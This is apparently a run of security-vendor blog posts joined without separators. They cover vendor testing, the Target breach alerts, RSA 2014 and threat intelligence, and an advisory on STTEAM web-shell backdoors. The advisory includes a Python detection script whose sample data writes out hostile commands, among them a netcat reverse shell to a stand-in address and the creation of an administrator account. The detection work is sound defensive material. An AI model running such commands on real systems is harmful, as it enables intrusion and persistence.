A true advanced threat is a “who”, not a “how.” All too often we equate an advanced threat with the new 0-day exploit or targeted malware, but these are not the threats; they are the tactics of the attacker.
Security vendors have pulled the perfect long con on the world by convincing us that Advanced Threat Defense (ATD) is about malware, spear phishing or browser exploits, while ignoring the fact that at the other end of that spear phish is someone determined to break into your network by any means possible. Are we to believe that because an advanced malware product may detect a new browser exploit, it has actually stopped the attacker from getting into your network? No. True advanced threats, the people who want your data, will pound on the door until they knock it off its hinges. Niche Advanced Tactic Detection (ATD) products do have a place in detecting a portion of the attempts to breach the network, but what is really core to defending against advanced threats is the ability to find them once they are inside your network.
What the heck does a graphic like this have to do with security (or surfing – my other favorite topic)? Well, nothing to do with surfing (except the dude in the front could use a better suit), but a lot to do with security… Please humor me, grab a cup of coffee and read on…
While we are all fighting the good fight against cyber attacks and threats every day, it’s important to also test ourselves in other ways – namely independent lab testing that evaluates vendors based on their technologies’ capabilities. As you may remember from over the summer, we participated in NSS Labs’ Breach Detection System (BDS) test alongside other security vendors – originally ten companies (AhnLab, Damballa, FireEye, Lastline, McAfee, Palo Alto Networks, Sourcefire, Symantec, Trend Micro and Fidelis) were called to the table, but only three (AhnLab, FireEye and Fidelis) were able to make it through and only two (AhnLab and Fidelis) chose to make their results public for our customers.
Turns out, there is a lot of hand waving, marketing and smoke out there from security vendors, but not a lot of truth in the picture.
On March 14th, Bloomberg BusinessWeek published a lengthy article entitled, “Missed Alarms and 40 Million Stolen Credit Card Numbers: How Target Blew It”. The article highlighted the fact that Target had purchased $1.6M in FireEye advanced threat defense gear that had indeed detected two related pieces of malware on the Target network, but that Target had failed to respond to the alerts issued by the MSSP in Bangalore that was monitoring the equipment.
We see this all too often in the network incident response investigations we are called on to conduct. Companies pay good money for network security tools with the expectation that the technology will protect them from a breach. Unfortunately, that is often not the case. Where is the disconnect? Were the tools oversold? Were they implemented incorrectly? Were they poorly tuned? Or were incident response personnel not properly trained to understand the alerts and data the tools provided? These are the questions Target and its incident response providers need to grapple with in order to develop effective remediation strategies and avoid a recurrence.
A number of subsequent articles focused on whether Target should have reacted to these alerts. Many of the articles provided balanced perspectives on the challenges of responding to a few specific alerts against the background noise of hundreds, often thousands of attacks hitting large networks every day.
What these articles uniformly missed was the crucial question: why did the network security systems Target employed provide so few actionable alerts, so late in the life cycle of the attack?
Once again, the trifecta of the Fidelis Customer Advisory Board gathering, the AGC Infosecurity Conference and RSA 2014 delivered tremendous insights and validation. The need for speed, which I talked about in my pre-RSA post was a key theme. And after more than 100 hours of conversation with customers, threat researchers, industry colleagues and experts, I am even more certain the only way to minimize the time to threat discovery, containment and remediation is to achieve an optimal combination of technology, knowledge and experience, and threat intelligence.
As I walked the aisles of both the Moscone South and North halls, I found the experience to be a metaphor for what’s going on in the network. There was a lot of noise and promise but also a lack of clarity. I thought the South hall had a better vibe and more energy, and a collection of vendors who are all about innovation. The North hall was more about the “big guys” in cavernous booths, many of whom were talking cybersecurity as a veil over their infrastructure business, rather than a core competency.
However, no matter which hall you were in, everyone’s messages sounded the same, making it virtually impossible for customers to discern what’s real and what isn’t or how each vendor can help them.
Unfortunately, the challenge for customers is far greater than just sifting through a confusing vendor landscape to figure out who meets their needs. For the most part, the disruptive forces were the same as a year ago: advanced threats, big data and cloud, with increasing conversation about the Internet of Things adding complexity to securing an ever-expanding attack surface.
What took the RSA 2014 environment from confusing to frenzied was the backdrop presented by the relevance and immediacy of the retailer breaches, the backdoors and privacy issues, potential legislation, and even macroeconomic questions around whether customers outside of the U.S. will shy away from buying technology from American companies. In many cases, it was these topics dominating the conversation in the booths and over drinks and dinner.
We’ve seen an increasing focus on threat intelligence with more companies offering it than there were a year ago, and the emergence of informal groups acknowledging they have things in common and agreeing to share threat intelligence. Even with this, I believe threat intelligence is truly in its embryonic stage. There are so many questions and opportunities for improvement -- the most significant today being, 1) How can we anonymize threat information so it can be shared more widely across relevant communities – verticals, geographies – to defend against a common enemy?; and 2) How can we improve the fidelity of the feeds?
At the Fidelis Customer Advisory Board meeting, we had overwhelming interest in customers wanting to contribute anonymized threat intelligence information so we can make it actionable on our advanced threat defense platform even more quickly. (In response to this, we are planning to create a virtual community that will enable this, but more on that another day.)
This is good forward progress. But the reality is that no one is satisfied with the threat intelligence available today, primarily because of how noisy networks are and how hard it is to determine what’s real and what isn’t (just like the environment at RSA 2014!). Customers want to know what the 10 most dangerous threats are in their network that they need to hunt down and deal with. They don’t have the ability to hunt and capture 100, and the worst part is they are seeing 1,000 alerts that make the entire process unmanageable.
So as an industry, we have our marching orders: We need to deliver high fidelity, high quality threat intelligence.
We already have analysts aggregating sources of data and building situational awareness about a problem. We need to keep advancing our efforts to fuse that data together and reduce the time it takes to discover valid information in it. We need to figure out how to factor in classified data that no one can get access to. And we need to do this against a backdrop of legislative and privacy issues, in a threat environment that is not standing still, and in a business climate where advancements are outpacing the ability to secure everything. Said another way, in a world in which it is becoming easier, not harder, for an adversary to succeed in having its way with its target.
Is it exciting to be eyeball-deep in cybersecurity? It sure is. Is it scary? It sure is. To date we’ve primarily dealt with adversaries whose primary goal has been disruption and theft. This has created a critical, global problem. If this turns to destruction, which many are predicting (think making 80,000 cars turn right when the driver wants to turn left, courtesy of the Internet of Things), the criticality of the problem increases exponentially.
It might seem odd, since the picture I’ve painted isn’t that encouraging, but I am more optimistic than ever after attending these meetings and shows that the formula is clear: smarter people, better tools and higher-fidelity threat intelligence are the key to catching up with the adversary. And I am confident this industry can come together and do it.
I welcome feedback and debate on this perspective.
'Security Intelligence' was a strong theme at RSAC 2014. This covered a wide gamut of activities, including the collection of data; analysis of collected data leading to actionable intelligence products, covering indicators that can be used for detection; and knowledge that can be used to enrich analysis post-detection, preferably with predictive value too. These cycles of the intelligence development process seemed to cover a large portion of the sessions, vendor messaging on the show floor as well as conversations that extended to the blogosphere, most notably here.
We made our own contribution to intelligence sharing at the RSA conference this year. We published a new Threat Advisory analyzing a new campaign called STTEAM targeting the Oil and Gas industry in the Middle East. We became aware of this threat when a specific organization was attacked and our investigation revealed a number of other targets across the region. This led to us publishing the paper with indicators that could be used by security analysts to determine if they saw signs of a compromise in their environments and by security researchers, who look to correlate our findings with their investigations into similar campaigns, potentially by the same threat actors.
We've also announced our partnership with ThreatConnect, a platform that allows for collaboration between security researchers through sharing of threat intelligence. Users can now directly import indicators that have been shared through ThreatConnect.
Additionally, we continue to invest in our integration of YARA, the fast-emerging standard for describing and classifying malware. While this gives our customers another way of detecting and acting upon malicious activity in real time, it also enables them to share information about malware with others in the community, whether or not those others use Fidelis XPS.
The conversations at RSAC 2014 helped confirm that while many of us in the research community continue to develop and distribute our own threat intelligence, more has to be done to allow enterprises to leverage the broader pool of intelligence that exists across industry and government. We look forward to participating in the realization of that goal.
In the past week, we have observed increased attack activity against the Oil & Gas industry in the Middle East by a group of threat actors using the handle “STTEAM”. The group has also been observed attacking and compromising state government websites in the same area.
This group has compromised web pages of various organizations in the Middle East and has added some specific strings to them. We are providing those strings to local authorities to assist in identifying victim organizations.
Some of the compromised servers will display the following screen when accessed:
Once the websites are compromised, the group has been observed uploading two ASP shell backdoors. One of them contains words in Turkish and appears to have been developed by someone going by the following handle:
This backdoor lets the attacker obtain system information, connect to SQL databases, list tables and execute commands, browse directories, perform file manipulations (upload, download, copy, delete, modify, searches, etc.), and perform folder manipulations (delete, copy, etc.).
The other ASP Shell Backdoor appears to be known as “K-Shell/ ZHC Shell 1.0 / Aspx Shell” and developed by two persons going by the handles of:
This backdoor contains most of the same features as the “Zehir4” backdoor, but adds the ability to add a user to the system, add a user to the Administrators group, disable the Windows Firewall, enable RDP, delete IIS logs, and start the netcat utility as a reverse backdoor shell.
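The capabilities just listed translate directly into host telemetry a defender can hunt for. The following Python script is an added example, not part of the advisory and not Fidelis code: it runs a small rule set over constructed process-creation records (the kind carried by Sysmon event 1 or Windows Security event 4688) and escalates when the commands are spawned by the IIS worker process w3wp.exe, which is how an ASP shell ends up executing them. The advisory does not publish the shells' exact command lines, so the patterns encode the standard Windows commands that achieve each of the listed actions; the host names, command lines and the address 203.0.113.5 are all constructed sample data.

```python
"""Hunt process-creation telemetry for the post-compromise actions described
above (add user, add to Administrators, disable firewall, enable RDP, delete
IIS logs, netcat reverse shell).  Added example; patterns are the standard
Windows commands for each action, not the shells' own code."""
import re

IIS_WORKER = "w3wp.exe"  # parent image of anything an ASP/ASPX shell spawns

# Rule name -> regex over the command line (case-insensitive).
RULES = {
    "add_local_user": re.compile(
        r"\bnet(?:1)?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "add_to_administrators": re.compile(
        r"\bnet(?:1)?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "disable_firewall": re.compile(  # modern advfirewall and legacy opmode forms
        r"\bnetsh(?:\.exe)?\s+(?:advfirewall\s+set\s+\w+\s+state\s+off"
        r"|firewall\s+set\s+opmode\s+(?:mode=)?disable)\b", re.I),
    "enable_rdp": re.compile(  # fDenyTSConnections = 0 turns Remote Desktop on
        r"\breg(?:\.exe)?\s+add\b.*Terminal Server.*fDenyTSConnections.*\s/d\s+0\b", re.I),
    "delete_iis_logs": re.compile(
        r"\b(?:del|erase|rd|rmdir|Remove-Item)\b.*\\inetpub\\logs\\LogFiles", re.I),
    "netcat_reverse_shell": re.compile(
        r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s+(?:cmd|powershell)", re.I),
}


def match_rules(cmdline):
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def triage(events):
    """Group rule hits per host.

    Each event is {"host", "parent", "cmdline"}.  Severity is 'critical' when
    any hit was spawned by the IIS worker or two or more distinct rules fire on
    the host, 'high' for a single rule, 'none' otherwise.
    """
    report = {}
    for ev in events:
        entry = report.setdefault(
            ev["host"], {"hits": [], "from_iis": False, "severity": "none"})
        hits = match_rules(ev["cmdline"])
        if not hits:
            continue
        entry["hits"].extend((name, ev["cmdline"]) for name in hits)
        if ev["parent"].lower() == IIS_WORKER:
            entry["from_iis"] = True
    for entry in report.values():
        distinct = {name for name, _ in entry["hits"]}
        if entry["from_iis"] or len(distinct) >= 2:
            entry["severity"] = "critical"
        elif distinct:
            entry["severity"] = "high"
    return report


# Constructed sample telemetry: one web host worked by a shell, two benign hosts,
# and an admin host with a single (possibly legitimate) group change.
SAMPLE_EVENTS = [
    {"host": "web01", "parent": "w3wp.exe",
     "cmdline": "cmd.exe /c net user backup P@ssw0rd1 /add"},
    {"host": "web01", "parent": "w3wp.exe",
     "cmdline": "cmd.exe /c net localgroup administrators backup /add"},
    {"host": "web01", "parent": "w3wp.exe",
     "cmdline": "cmd.exe /c netsh firewall set opmode disable"},
    {"host": "web01", "parent": "cmd.exe",
     "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
                r" /v fDenyTSConnections /t REG_DWORD /d 0 /f"},
    {"host": "web01", "parent": "cmd.exe",
     "cmdline": r"cmd.exe /c del /q C:\inetpub\logs\LogFiles\W3SVC1\*.log"},
    {"host": "web01", "parent": "cmd.exe",
     "cmdline": r"C:\Windows\Temp\nc.exe -e cmd.exe 203.0.113.5 4444"},
    {"host": "fs02", "parent": "explorer.exe",
     "cmdline": r"net use Z: \\fileserver\share"},
    {"host": "fs02", "parent": "cmd.exe",
     "cmdline": "netsh interface show interface"},
    {"host": "adm03", "parent": "cmd.exe",
     "cmdline": "net localgroup administrators svc_backup /add"},
]

if __name__ == "__main__":
    for host, entry in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{host}: {entry['severity']} (from IIS: {entry['from_iis']})")
        for name, cmd in entry["hits"]:
            print(f"  [{name}] {cmd}")
```

The from_iis flag is the most valuable signal here: a command shell as a child of w3wp.exe is rare on a healthy web server, so even a single hit with that parent deserves a look, whereas the same net localgroup command from an administrator's console (host adm03 in the sample) is only worth a ticket.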
We observed an attacker at the following IP address trying to upload these backdoors to a victim system: “220.127.116.11”.
This document provides information about the two ASP shell backdoors used by the threat actors in a recent incident, covering their functionality and the associated network indicators.
Perhaps you've heard the old information security gag: "if you're a diver, you don't have to swim faster than the shark, just faster than your buddy." It's sometimes good for a chuckle and suggests that we should merely aspire to implement enough security to make us a less attractive target than our peers. Nowadays the joke is a little stale, because as Josh Corman points out in his recent TEDx talk*, sometimes the shark has a buddy too. As risks proliferate and as the bad guys of all kinds get better (badder?) at what they do, "good enough" security hasn't been remotely good enough for years. So I was particularly glad to have the opportunity to gather with some of our best and brightest customers this weekend at our second annual Customer Advisory Board meeting for a frank discussion about how we're all doing before we headed down to San Francisco for the annual RSA Conference.